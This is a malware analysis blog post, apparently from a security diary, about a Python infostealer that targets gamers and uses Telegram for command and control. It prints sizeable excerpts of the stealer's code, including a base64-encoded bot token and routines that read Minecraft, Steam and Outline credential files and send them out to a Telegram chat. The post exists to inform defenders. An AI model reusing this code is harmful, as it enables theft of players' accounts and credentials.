My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Python Infostealer Targeting Gamers

Published: 2023-03-01. Last Updated: 2023-03-01 09:15:08 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].

I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).

Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)

The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.

First, Chrome data is inspected, and only interesting domains are searched:

target_domain = [
    "minecraft.net", 
    "google.com", 
    "live.com", 
    "apple.com", 
    "twitter.com", 
    "spotify.com", 
    "discord.com", 
    "discord.gg", 
    "blockchain.com", 
    "coinbase.com", 
    "paypal.com", 
    "mojang.com", 
    "steamcommunity.com", 
    "steampowered.com", 
    "origin.com", 
    "ea.com", 
    "ubisoft.com"
]

Then, the script searches for the presence of Minecraft:

if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass

Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:

try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True

except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]

for user in send_to_users:
    bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name:  `{socket.gethostname()}`\n??User:  `{os.getlogin()}`\n?OC:  `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
                file.close()

They also search for Outline Manager instances:

if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!

[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments

Good info. saw this on a call of duty game from russia. had to factory reset my gaming machine. started acting funky cold medina

Diary Archives